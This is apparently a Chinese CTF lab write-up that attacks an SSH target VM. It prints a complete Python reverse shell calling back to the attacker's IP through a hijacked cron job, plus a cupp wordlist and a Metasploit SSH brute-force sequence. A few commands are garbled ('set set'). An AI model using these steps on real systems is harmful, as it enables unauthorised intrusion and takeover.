「安全笔记」 CTF-SSH 服务测试

环境搭建

注意这里的靶场由于版本的问题，只能使用VM VirtualBox安装，攻击机用kali Linux在VMware上安装，这里有个坑，在配置网络的时候，全部选择桥接模式，但是VMware下 编辑->虚拟网络编辑器->更改设置->nat0网卡桥接到的外部网络需要和VirtualBox桥接到的一致，不然搜索不到网络，而且桥接模式模拟真实计算机在网络中，利用本机网卡来获取地址的。所以必须连接在同一网络环境下。

靶机连接在文章最底部

正式开始

/etc/passwd 查看所有用户的列表
/etc/group 查看用户组
或者
find / -user 用户名 查看属于某些用户的文件
/tmp 查看缓冲文件

查看用户列表发现我们猜测的用户都存在。

在排查完这些文件之后，发现我们需要的信息都不存在，那么我们就需要深入挖掘

我们可以通过 /etc/crontab 这个文件。这个文件是设定系统定期执行的任务。如果说在这个目录下有某个用户的计划文件，但是具体目录下没有这个文件。那么我们就可以经行创建反弹shell，然后用netcat监听获得用户的权限。

如果存在那么可以查看有无执行权限

我们输入 cat /etc/crontab 查看这个文件，发现目录下有个jimmy用户的 python 文件每五分钟执行一次，进入指定目录查看发现没有那个文件。那么我们就可以利用这个文件经行反弹shell

我们编写一个tcp客户端来反弹shell

#!/usr/bin/python
import os,subprocess,socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(("192.168.43.141",1234))#注意这里是kali的ip和你在netcat上监听地端口
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

将这个文件保存在/tmp目录下然后命名为sekurity.py，并使用 chmod +x sekurity.py 设置可执行权限。在kali上使用netcat监听端口。

kali上输入 nc -lpv 1234 等个几分钟就会看到返回的shell。输入 whoami 发现是jimmy，成功反弹shell。但是查看用户发现并不是root，那么这个方式也失败了。

那么我们只能使用暴力破解了

这里我们使用比较知名的cupp创建个性化字典。

git clone https://github.com/jeanphorn/common-password.git #注意安装git命令
chmod +x cupp.py
./cupp.py -i #以交互方式创建字典

创建时你可以生成自己喜欢的字典:-p我这里除了末尾随即字符选了y其他全部回车

然后使用msfconsole进行爆破

msf > use auxiliary/scanner/ssh/ssh_login
msf > show options #查看参数列表
msf > set rhosts  192.168.43.197 #靶机ip
msf > set username hadi
msf > set set pass_file /root/桌面/tools/common-password/hadi.txt #cupp生成的密码文件地址
msf > set set threads 5 #设置线程
msf > run #开始爆破

成功爆破出密码hadi123

这时候我们使用 session -i 1 连接会话，

python -c "import pty;pty.spawn('/bin/bash')" 优化显示

然后使用su - root提升权限，这时候我们就是root了，然后就可以为所欲为了。

cat flag.txt 就得到了flag啦。